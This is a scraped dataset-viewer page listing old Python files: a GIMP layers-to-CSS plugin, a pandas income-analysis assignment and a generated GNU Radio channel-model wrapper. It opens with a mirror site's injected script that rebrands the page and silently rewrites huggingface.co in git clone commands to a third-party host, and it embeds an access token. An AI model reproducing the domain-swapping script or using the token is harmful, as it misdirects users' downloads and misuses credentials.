{ // 获取包含Hugging Face文本的span元素 const spans = link.querySelectorAll('span.whitespace-nowrap, span.hidden.whitespace-nowrap'); spans.forEach(span => { if (span.textContent && span.textContent.trim().match(/Hugging\s*Face/i)) { span.textContent = 'AI快站'; } }); }); // 替换logo图片的alt属性 document.querySelectorAll('img[alt*="Hugging"], img[alt*="Face"]').forEach(img => { if (img.alt.match(/Hugging\s*Face/i)) { img.alt = 'AI快站 logo'; } }); } // 替换导航栏中的链接 function replaceNavigationLinks() { // 已替换标记,防止重复运行 if (window._navLinksReplaced) { return; } // 已经替换过的链接集合,防止重复替换 const replacedLinks = new Set(); // 只在导航栏区域查找和替换链接 const headerArea = document.querySelector('header') || document.querySelector('nav'); if (!headerArea) { return; } // 在导航区域内查找链接 const navLinks = headerArea.querySelectorAll('a'); navLinks.forEach(link => { // 如果已经替换过,跳过 if (replacedLinks.has(link)) return; const linkText = link.textContent.trim(); const linkHref = link.getAttribute('href') || ''; // 替换Spaces链接 - 仅替换一次 if ( (linkHref.includes('/spaces') || linkHref === '/spaces' || linkText === 'Spaces' || linkText.match(/^s*Spacess*$/i)) && linkText !== 'OCR模型免费转Markdown' && linkText !== 'OCR模型免费转Markdown' ) { link.textContent = 'OCR模型免费转Markdown'; link.href = 'https://fast360.xyz'; link.setAttribute('target', '_blank'); link.setAttribute('rel', 'noopener noreferrer'); replacedLinks.add(link); } // 删除Posts链接 else if ( (linkHref.includes('/posts') || linkHref === '/posts' || linkText === 'Posts' || linkText.match(/^s*Postss*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } // 替换Docs链接 - 仅替换一次 else if ( (linkHref.includes('/docs') || linkHref === '/docs' || linkText === 'Docs' || linkText.match(/^s*Docss*$/i)) && linkText !== '模型下载攻略' ) { link.textContent = '模型下载攻略'; link.href = '/'; replacedLinks.add(link); } // 删除Enterprise链接 else if ( (linkHref.includes('/enterprise') || linkHref === '/enterprise' || linkText === 'Enterprise' || linkText.match(/^s*Enterprises*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } }); // 查找可能嵌套的Spaces和Posts文本 const textNodes = []; function findTextNodes(element) { if (element.nodeType === Node.TEXT_NODE) { const text = element.textContent.trim(); if (text === 'Spaces' || text === 'Posts' || text === 'Enterprise') { textNodes.push(element); } } else { for (const child of element.childNodes) { findTextNodes(child); } } } // 只在导航区域内查找文本节点 findTextNodes(headerArea); // 替换找到的文本节点 textNodes.forEach(node => { const text = node.textContent.trim(); if (text === 'Spaces') { node.textContent = node.textContent.replace(/Spaces/g, 'OCR模型免费转Markdown'); } else if (text === 'Posts') { // 删除Posts文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } else if (text === 'Enterprise') { // 删除Enterprise文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } }); // 标记已替换完成 window._navLinksReplaced = true; } // 替换代码区域中的域名 function replaceCodeDomains() { // 特别处理span.hljs-string和span.njs-string元素 document.querySelectorAll('span.hljs-string, span.njs-string, span[class*="hljs-string"], span[class*="njs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换hljs-string类的span中的域名(移除多余的转义符号) document.querySelectorAll('span.hljs-string, span[class*="hljs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换pre和code标签中包含git clone命令的域名 document.querySelectorAll('pre, code').forEach(element => { if (element.textContent && element.textContent.includes('git clone')) { const text = element.innerHTML; if (text.includes('huggingface.co')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 处理特定的命令行示例 document.querySelectorAll('pre, code').forEach(element => { const text = element.innerHTML; if (text.includes('huggingface.co')) { // 针对git clone命令的专门处理 if (text.includes('git clone') || text.includes('GIT_LFS_SKIP_SMUDGE=1')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 特别处理模型下载页面上的代码片段 document.querySelectorAll('.flex.border-t, .svelte_hydrator, .inline-block').forEach(container => { const content = container.innerHTML; if (content && content.includes('huggingface.co')) { container.innerHTML = content.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 特别处理模型仓库克隆对话框中的代码片段 try { // 查找包含"Clone this model repository"标题的对话框 const cloneDialog = document.querySelector('.svelte_hydration_boundary, [data-target="MainHeader"]'); if (cloneDialog) { // 查找对话框中所有的代码片段和命令示例 const codeElements = cloneDialog.querySelectorAll('pre, code, span'); codeElements.forEach(element => { if (element.textContent && element.textContent.includes('huggingface.co')) { if (element.innerHTML.includes('huggingface.co')) { element.innerHTML = element.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { element.textContent = element.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); } // 更精确地定位克隆命令中的域名 document.querySelectorAll('[data-target]').forEach(container => { const codeBlocks = container.querySelectorAll('pre, code, span.hljs-string'); codeBlocks.forEach(block => { if (block.textContent && block.textContent.includes('huggingface.co')) { if (block.innerHTML.includes('huggingface.co')) { block.innerHTML = block.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { block.textContent = block.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); }); } catch (e) { // 错误处理但不打印日志 } } // 当DOM加载完成后执行替换 if (document.readyState === 'loading') { document.addEventListener('DOMContentLoaded', () => { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); }); } else { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); } // 增加一个MutationObserver来处理可能的动态元素加载 const observer = new MutationObserver(mutations => { // 检查是否导航区域有变化 const hasNavChanges = mutations.some(mutation => { // 检查是否存在header或nav元素变化 return Array.from(mutation.addedNodes).some(node => { if (node.nodeType === Node.ELEMENT_NODE) { // 检查是否是导航元素或其子元素 if (node.tagName === 'HEADER' || node.tagName === 'NAV' || node.querySelector('header, nav')) { return true; } // 检查是否在导航元素内部 let parent = node.parentElement; while (parent) { if (parent.tagName === 'HEADER' || parent.tagName === 'NAV') { return true; } parent = parent.parentElement; } } return false; }); }); // 只在导航区域有变化时执行替换 if (hasNavChanges) { // 重置替换状态,允许再次替换 window._navLinksReplaced = false; replaceHeaderBranding(); replaceNavigationLinks(); } }); // 开始观察document.body的变化,包括子节点 if (document.body) { observer.observe(document.body, { childList: true, subtree: true }); } else { document.addEventListener('DOMContentLoaded', () => { observer.observe(document.body, { childList: true, subtree: true }); }); } })(); \n\"\"\"\n with open(html_filepath, \"wb\") as f:\n f.write(self.html)\n\ndef export_layers_to_css(img, drw, path, scale=1, only_named=False):\n base_name = \"graphics-\" + img.name.rsplit('.', 1)[0]\n\n pdb.gimp_message('Only named: %d'%only_named)\n dupe = img.duplicate()\n css = Css(base_name=base_name, scale=scale, only_named=only_named)\n def parse_layers(layers, level=0, offset_y=0):\n for layer in layers:\n layer.visible = True\n if hasattr(layer, \"layers\") and layer.layers:\n offset_y = parse_layers(layer.layers, level+1, offset_y)\n else:\n layer.set_offsets(0, offset_y)\n try:\n css.add_layer(layer)\n offset_y += layer.height\n except:\n layer.visible = False\n \n return offset_y\n offset_y = parse_layers(dupe.layers)\n merged_layer = dupe.merge_visible_layers(EXPAND_AS_NECESSARY)\n# pdb.gimp_message('Done. offset_y=%d image.height=%d'%(offset_y, merged_layer.height))\n css.save(path=path, image_width=merged_layer.width)\n image_filename = base_name + \".png\"\n image_filepath = os.path.join(path, image_filename);\n pdb.file_png_save(dupe, merged_layer, image_filepath, image_filename, 0, 9, 1, 1, 1, 1, 1)\n gimp.delete(dupe)\n \nregister(\n proc_name=(\"python-fu-layers-to-css\"),\n blurb=(\"Export Layers to one PNG with CSS stylesheet\"),\n help=(\"\"\"Export Layers to one PNG with CSS stylesheet\n \n \"\"\"),\n author=(\"Per Rosengren\"),\n copyright=(\"Stunning AB\"),\n date=(\"2012\"),\n label=(\"to _CSS\"),\n imagetypes=(\"*\"),\n params=[\n (PF_IMAGE, \"img\", \"Image\", None),\n (PF_DRAWABLE, \"drw\", \"Drawable\", None),\n (PF_DIRNAME, \"path\", \"Save PNG and CSS here\", os.getcwd()),\n (PF_INT, \"scale\", \"The scale of the image\", 1),\n (PF_BOOL, \"only_named\", \"Only export layers named .\", False),\n ],\n results=[],\n function=(export_layers_to_css), \n menu=(\"/File/E_xport Layers\"), \n domain=(\"gimp20-python\", gimp.locale_directory)\n )\n\nmain()\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2012,"string":"2,012"}}}],"truncated":false,"partial":false},"paginationData":{"pageIndex":20,"numItemsPerPage":100,"numTotalItems":42509,"offset":2000,"length":100}},"jwt":"eyJhbGciOiJFZERTQSJ9.eyJyZWFkIjp0cnVlLCJwZXJtaXNzaW9ucyI6eyJyZXBvLmNvbnRlbnQucmVhZCI6dHJ1ZX0sImlhdCI6MTc1Njg0OTk3Niwic3ViIjoiL2RhdGFzZXRzL2xvdWJuYWJubC9vbGRfcHl0aG9uIiwiZXhwIjoxNzU2ODUzNTc2LCJpc3MiOiJodHRwczovL2h1Z2dpbmdmYWNlLmNvIn0.iVplbPoQmVtUYf6DlJvDFRtSajBIX8rIJWd9AYfj3Q-iympQwUAcURip639C60-w2wkTOREIKR_8KrTI752eDA","displayUrls":true},"discussionsStats":{"closed":0,"open":1,"total":1},"fullWidth":true,"hasGatedAccess":true,"hasFullAccess":true,"isEmbedded":false,"savedQueries":{"community":[],"user":[]}}">
__id__
int64
3.09k
19,722B
blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
2
256
content_id
stringlengths
40
40
detected_licenses
list
license_type
stringclasses
3 values
repo_name
stringlengths
5
109
repo_url
stringlengths
24
128
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringlengths
4
42
visit_date
timestamp[ns]
revision_date
timestamp[ns]
committer_date
timestamp[ns]
github_id
int64
6.65k
581M
star_events_count
int64
0
1.17k
fork_events_count
int64
0
154
gha_license_id
stringclasses
16 values
gha_fork
bool
2 classes
gha_event_created_at
timestamp[ns]
gha_created_at
timestamp[ns]
gha_updated_at
timestamp[ns]
gha_pushed_at
timestamp[ns]
gha_size
int64
0
5.76M
gha_stargazers_count
int32
0
407
gha_forks_count
int32
0
119
gha_open_issues_count
int32
0
640
gha_language
stringlengths
1
16
gha_archived
bool
2 classes
gha_disabled
bool
1 class
content
stringlengths
9
4.53M
src_encoding
stringclasses
18 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
year
int64
1.97k
2.01k
8,263,517,092,121
9a5c3c534acf7c4cb420b8e42b809375c7a96c5d
6b826e7857ac9d785d5451a94185f67b823a0b1b
/mer567/Assignment9.py
65414bde47c96e3728db0faf202562bc6e361712
[]
no_license
mrotmensch/assignment9
https://github.com/mrotmensch/assignment9
6bc5f2fc2ade7b842896543455ac9ad4e8058f15
ecfb7787e3bfde8f6199cda35130d074dc11b006
refs/heads/master
2021-01-18T05:09:23.618656
2014-11-22T00:03:10
2014-11-22T00:03:10
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
############################# # # # Assignment 9 # # Maya Rotmensch # # # ############################# """ Formatting for doc strings was done according to google style guide https://google-styleguide.googlecode.com/svn/trunk/pyguide.html""" from pylab import rcParams from collections import defaultdict import pandas as pd import numpy as np import matplotlib.pyplot as plt def loadData(): countries = pd.read_csv("countries.csv") income_initial = pd.ExcelFile("indicator gapminder gdp_per_capita_ppp.xlsx") dfs = {sheet_name: income_initial.parse(sheet_name) for sheet_name in income_initial.sheet_names} income = dfs['Data'] # we only care about the sheet containing the data income_transformed = income.set_index("gdp pc test").T return countries, income_transformed def incomeDistribution(year): """ Graphes the income distribution for a given year. ignores missing (Nan) values Args: year: the year for which the distribution is calculated. must be inputed in int form (not string!). Returns: saves .png of distribution. """ rcParams['figure.figsize'] = 15,7 income_for_given_year = income.ix[year] plottable_values = income_for_given_year[income_for_given_year.notnull()] plt.hist(plottable_values, bins = 50) plt.title("Distribution of income across countries \n for the year %s" %year) plt.xlabel("Income per person") plt.ylabel("Counts") plt.savefig("incomeDistribution for %s" %year) plt.show() return def merge_by_year(year, all_infomation_present = True): """ Merges the income and countries DataFrames for a given year. Columns are 'Country', 'Region', and 'Income'. Args: year: int. the year for which the distribution is calculated. all_infomation_present: boolean. If true performs inner join. If false performs outer join and keeps all rows with partial information (will discard rows with missing information for both region and income fields) Returns: merged_2 : a merged pandas DataFrame for the given year. """ countries_shifted_index = countries.set_index('Country') income_given_year = income.ix[year] if all_infomation_present == True: merged = pd.concat([countries_shifted_index,income_given_year], axis = 1, join = "inner") else: merged = pd.concat([countries_shifted_index,income_given_year], axis = 1, join = "outer") merged = merged.dropna(how = "all") #drop rows with no information of region and income. merged_2 = merged.reset_index(level=0) merged_2.columns = ['Country', 'Region', 'Income'] return merged_2 def incomeOverTime(country): """ graphs change in the income per person for a given country over time. ignores missing information. Args: country: string. country for which the analysis is performed. Returns: save .png of change of Income over time. Raises: NotEnoughInformation: If less than less than 2 information points. """ country_income_timeline = income[country] income_not_null = country_income_timeline[country_income_timeline.notnull()] if len(income_not_null>2): # must have more than 2 points to plot plt.plot(income_not_null.index,income_not_null) plt.xlabel("Year") plt.ylabel("Income") plt.xlim((income_not_null.index[0],income_not_null.index[-1])) plt.title("Change of Income over time in %s" %country) plt.savefig("Change of Income over time in %s.png" %country) plt.show() return def distributionOfIcomeByRegion(year): """Graphes the distribution of income per person by region. ignores null values. Args: year: int. the year for which the analysis will be performed. Returns: 6 sub plots (all histoggrams) depicting the distribution of income for region by year. note that the distributions are normalized. saves plot grid as .png """ merged = merge_by_year(year) #get info for year regions = countries.Region.unique() regions = np.array(regions).reshape(3,2) f, axarr = plt.subplots(regions.shape[0], regions.shape[1]) #create grid #populate subplots. for i in range(regions.shape[0]): for j in range(regions.shape[1]): r = regions[i,j] income_per_region = merged.Income[merged.Region== regions[i,j]] income_not_null = income_per_region[income_per_region.notnull()] axarr[i, j].hist(income_not_null.values, bins = 20, normed = True) axarr[i, j].set_title("Distribution of income for %s in year %s" %(str(regions[i,j]),year)) plt.tight_layout() plt.savefig("Distribution of income for %s in year %s" %(str(regions[i,j]),year)) plt.show() return def MeanIncomeOverTime(region): """Plots the mean income per person in a given region over time. analysis ignores null values. Args: region: string. the region for which the analysis will be performed. Returns: a graph of the change in income over time. plot saved as .png """ over_time = [] #calculate mean income per person in region for given year for i in income.index: merged = merge_by_year(i) income_per_region = merged.Income[merged.Region== region].mean() over_time.append(income_per_region) plt.plot(income.index,over_time) plt.xlabel("Year") plt.ylabel("Income") plt.xlim((income.index[0],income.index[-1])) plt.title("Change of Income over time in %s" %region) plt.savefig("Change of Income over time in %s" %region) plt.show() return def MeanIncomeOverTimeAllRegions(): """ Plots the mean income per person in a given region over time. ovelays the graphs for the different regions for easier comparison. analysis ignores null values. Args: none. Returns: a graph of the change in income over time. plot saved as .png """ over_time = defaultdict(list) # dictionary of mean icome per person for region. keys are regions. for i in income.index: merged = merge_by_year(i) for region in countries.Region.unique(): income_per_region = merged.Income[merged.Region== region].mean() over_time[region].append(income_per_region) DF = pd.DataFrame(over_time, index=income.index) plt.plot(DF.index,DF.values) plt.legend(DF.columns, loc = 2) plt.xlabel("Year") plt.ylabel("Income") plt.xlim((DF.index[0],DF.index[-1])) plt.title("Change of Income over time") plt.savefig("Change of Income over time in all regions") plt.show() return DF def spreadByYear(year): """ Plots (boxplot) the spread of income per person for the regions for a given year. Args: year: int. the year for which the distribution is calculated. Returns: a box plot demostratint the difference in the spread of income per person for the different regions. """ merged = merge_by_year(year) spread = [] for region in merged.Region.unique(): spread_per_region = merged.Income[merged.Region== region] spread.append(spread_per_region.values) rcParams['figure.figsize'] = 15,7 plt.boxplot(spread) ticks = list(merged.Region.unique()) ticks.insert(0, "") plt.xticks(range(7), ticks, color='red') plt.ylabel("Income") plt.title("Spread of of Income for the year %s" %year) plt.savefig("Spread of of Income for the year %s" %year) plt.show() if __name__ == "__main__": countries, income = loadData() #Question 2: print "Head of income DF: \n", income.head() #Question 3: incomeDistribution(2000) #Question 4: merged = merge_by_year(2000) print "Head of merged DF: \n", merged.head() #Quetion 5: incomeOverTime("Afghanistan") distributionOfIcomeByRegion(2010) MeanIncomeOverTime("AFRICA") DF = MeanIncomeOverTimeAllRegions() spreadByYear(2010) """ Analysis of the graphs has shown that aggragating all countries, the distribution of income is right skewed. We can also tell that while Europe boasts the highest income per person, the income has decreased in recent years. Europe is also the region that has the largest spread in income per person in recent years (this is easy to see through the boxplot).In addition, we can see that in recent years Asia is experiencing the steepest ascent in income per person. """
UTF-8
Python
false
false
2,014
6,975,026,930,732
ca209574c521fedf9938ebd87bd33bb85016bfc0
c6e9e30cb39698c346eb24b3eeef7e3a5c570032
/gnuradio/build_debug/gr-channels/swig/channels_swig.py
891d48d17060e67ad33170beed7f4781cc0e1eec
[]
no_license
Darren2340/local_gnuradio
https://github.com/Darren2340/local_gnuradio
283ae020e21a64607fd0721f0c54217dccb5655d
db05a74ab64a5dfae6bca70dfcf57019153c64b5
refs/heads/master
2021-01-20T11:25:54.372134
2014-07-14T23:42:55
2014-07-14T23:42:55
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# This file was automatically generated by SWIG (http://www.swig.org). # Version 2.0.11 # # Do not make changes to this file unless you know what you are doing--modify # the SWIG interface file instead. from sys import version_info if version_info >= (2,6,0): def swig_import_helper(): from os.path import dirname import imp fp = None try: fp, pathname, description = imp.find_module('_channels_swig', [dirname(__file__)]) except ImportError: import _channels_swig return _channels_swig if fp is not None: try: _mod = imp.load_module('_channels_swig', fp, pathname, description) finally: fp.close() return _mod _channels_swig = swig_import_helper() del swig_import_helper else: import _channels_swig del version_info try: _swig_property = property except NameError: pass # Python < 2.2 doesn't have 'property'. def _swig_setattr_nondynamic(self,class_type,name,value,static=1): if (name == "thisown"): return self.this.own(value) if (name == "this"): if type(value).__name__ == 'SwigPyObject': self.__dict__[name] = value return method = class_type.__swig_setmethods__.get(name,None) if method: return method(self,value) if (not static): self.__dict__[name] = value else: raise AttributeError("You cannot add attributes to %s" % self) def _swig_setattr(self,class_type,name,value): return _swig_setattr_nondynamic(self,class_type,name,value,0) def _swig_getattr(self,class_type,name): if (name == "thisown"): return self.this.own() method = class_type.__swig_getmethods__.get(name,None) if method: return method(self) raise AttributeError(name) def _swig_repr(self): try: strthis = "proxy of " + self.this.__repr__() except: strthis = "" return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,) try: _object = object _newclass = 1 except AttributeError: class _object : pass _newclass = 0 def _swig_setattr_nondynamic_method(set): def set_attr(self,name,value): if (name == "thisown"): return self.this.own(value) if hasattr(self,name) or (name == "this"): set(self,name,value) else: raise AttributeError("You cannot add attributes to %s" % self) return set_attr def high_res_timer_now(): """high_res_timer_now() -> gr::high_res_timer_type""" return _channels_swig.high_res_timer_now() def high_res_timer_now_perfmon(): """high_res_timer_now_perfmon() -> gr::high_res_timer_type""" return _channels_swig.high_res_timer_now_perfmon() def high_res_timer_tps(): """high_res_timer_tps() -> gr::high_res_timer_type""" return _channels_swig.high_res_timer_tps() def high_res_timer_epoch(): """high_res_timer_epoch() -> gr::high_res_timer_type""" return _channels_swig.high_res_timer_epoch() class channel_model(object): """ Basic channel simulator. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), a (normalized) frequency offset (), a sample timing offset (), and a seed () to randomize or make reproducable the AWGN noise source. Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . To simulate a channel with time-variant channel, use gr::channels::channel_model2. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). frequency_offset : The normalized frequency offset. 0 is no offset; 0.25 would be, for a digital modem, one quarter of the symbol rate. epsilon : The sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. """ thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr def make(*args, **kwargs): """ make(double noise_voltage=0.0, double frequency_offset=0.0, double epsilon=1.0, pmt_vector_cfloat taps=std::vector< gr_complex >(1,1), double noise_seed=0, bool block_tags=False) -> channel_model_sptr Basic channel simulator. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), a (normalized) frequency offset (), a sample timing offset (), and a seed () to randomize or make reproducable the AWGN noise source. Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . To simulate a channel with time-variant channel, use gr::channels::channel_model2. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). frequency_offset : The normalized frequency offset. 0 is no offset; 0.25 would be, for a digital modem, one quarter of the symbol rate. epsilon : The sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. """ return _channels_swig.channel_model_make(*args, **kwargs) make = staticmethod(make) def set_noise_voltage(self, *args, **kwargs): """set_noise_voltage(channel_model self, double noise_voltage)""" return _channels_swig.channel_model_set_noise_voltage(self, *args, **kwargs) def set_frequency_offset(self, *args, **kwargs): """set_frequency_offset(channel_model self, double frequency_offset)""" return _channels_swig.channel_model_set_frequency_offset(self, *args, **kwargs) def set_taps(self, *args, **kwargs): """set_taps(channel_model self, pmt_vector_cfloat taps)""" return _channels_swig.channel_model_set_taps(self, *args, **kwargs) def set_timing_offset(self, *args, **kwargs): """set_timing_offset(channel_model self, double epsilon)""" return _channels_swig.channel_model_set_timing_offset(self, *args, **kwargs) def noise_voltage(self): """noise_voltage(channel_model self) -> double""" return _channels_swig.channel_model_noise_voltage(self) def frequency_offset(self): """frequency_offset(channel_model self) -> double""" return _channels_swig.channel_model_frequency_offset(self) def taps(self): """taps(channel_model self) -> pmt_vector_cfloat""" return _channels_swig.channel_model_taps(self) def timing_offset(self): """timing_offset(channel_model self) -> double""" return _channels_swig.channel_model_timing_offset(self) __swig_destroy__ = _channels_swig.delete_channel_model __del__ = lambda self : None; channel_model_swigregister = _channels_swig.channel_model_swigregister channel_model_swigregister(channel_model) def channel_model_make(*args, **kwargs): """ channel_model_make(double noise_voltage=0.0, double frequency_offset=0.0, double epsilon=1.0, pmt_vector_cfloat taps=std::vector< gr_complex >(1,1), double noise_seed=0, bool block_tags=False) -> channel_model_sptr Basic channel simulator. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), a (normalized) frequency offset (), a sample timing offset (), and a seed () to randomize or make reproducable the AWGN noise source. Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . To simulate a channel with time-variant channel, use gr::channels::channel_model2. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). frequency_offset : The normalized frequency offset. 0 is no offset; 0.25 would be, for a digital modem, one quarter of the symbol rate. epsilon : The sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. """ return _channels_swig.channel_model_make(*args, **kwargs) class channel_model2(object): """ Basic channel simulator allowing time-varying frequency and timing inputs. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), an initial timing offset (), and a seed () to randomize the AWGN noise source. Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . Unlike gr::channels::channel_model, this block is designed to enable time-varying frequency and timing offsets. Since the models for frequency and timing offset may vary and what we are trying to model may be different for different simulations, we provide the time-varying nature as an input function that is user-defined. If only constant frequency and timing offsets are required, it is easier and less expensive to use gr::channels::channel_model. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). epsilon : The initial sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. """ thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr def make(*args, **kwargs): """ make(double noise_voltage=0.0, double epsilon=1.0, pmt_vector_cfloat taps=std::vector< gr_complex >(1,1), double noise_seed=0, bool block_tags=False) -> channel_model2_sptr Basic channel simulator allowing time-varying frequency and timing inputs. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), an initial timing offset (), and a seed () to randomize the AWGN noise source. Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . Unlike gr::channels::channel_model, this block is designed to enable time-varying frequency and timing offsets. Since the models for frequency and timing offset may vary and what we are trying to model may be different for different simulations, we provide the time-varying nature as an input function that is user-defined. If only constant frequency and timing offsets are required, it is easier and less expensive to use gr::channels::channel_model. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). epsilon : The initial sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. """ return _channels_swig.channel_model2_make(*args, **kwargs) make = staticmethod(make) def set_noise_voltage(self, *args, **kwargs): """set_noise_voltage(channel_model2 self, double noise_voltage)""" return _channels_swig.channel_model2_set_noise_voltage(self, *args, **kwargs) def set_taps(self, *args, **kwargs): """set_taps(channel_model2 self, pmt_vector_cfloat taps)""" return _channels_swig.channel_model2_set_taps(self, *args, **kwargs) def set_timing_offset(self, *args, **kwargs): """set_timing_offset(channel_model2 self, double epsilon)""" return _channels_swig.channel_model2_set_timing_offset(self, *args, **kwargs) def noise_voltage(self): """noise_voltage(channel_model2 self) -> double""" return _channels_swig.channel_model2_noise_voltage(self) def taps(self): """taps(channel_model2 self) -> pmt_vector_cfloat""" return _channels_swig.channel_model2_taps(self) def timing_offset(self): """timing_offset(channel_model2 self) -> double""" return _channels_swig.channel_model2_timing_offset(self) __swig_destroy__ = _channels_swig.delete_channel_model2 __del__ = lambda self : None; channel_model2_swigregister = _channels_swig.channel_model2_swigregister channel_model2_swigregister(channel_model2) def channel_model2_make(*args, **kwargs): """ channel_model2_make(double noise_voltage=0.0, double epsilon=1.0, pmt_vector_cfloat taps=std::vector< gr_complex >(1,1), double noise_seed=0, bool block_tags=False) -> channel_model2_sptr Basic channel simulator allowing time-varying frequency and timing inputs. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), an initial timing offset (), and a seed () to randomize the AWGN noise source. Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . Unlike gr::channels::channel_model, this block is designed to enable time-varying frequency and timing offsets. Since the models for frequency and timing offset may vary and what we are trying to model may be different for different simulations, we provide the time-varying nature as an input function that is user-defined. If only constant frequency and timing offsets are required, it is easier and less expensive to use gr::channels::channel_model. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). epsilon : The initial sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. """ return _channels_swig.channel_model2_make(*args, **kwargs) class cfo_model(object): """ channel simulator This block implements a carrier frequency offset model that can be used to simulate carrier frequency drift typically from mixer LO drift on either transmit or receive hardware. A clipped gaussian random walk process is used. Constructor Specific Documentation: Build the carrier frequency offset model. Args: sample_rate_hz : Sample rate of the input signal in Hz std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum carrier frequency deviation in Hz. noise_seed : A random number generator seed for the noise source. """ thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr def make(*args, **kwargs): """ make(double sample_rate_hz, double std_dev_hz, double max_dev_hz, double noise_seed=0) -> cfo_model_sptr channel simulator This block implements a carrier frequency offset model that can be used to simulate carrier frequency drift typically from mixer LO drift on either transmit or receive hardware. A clipped gaussian random walk process is used. Constructor Specific Documentation: Build the carrier frequency offset model. Args: sample_rate_hz : Sample rate of the input signal in Hz 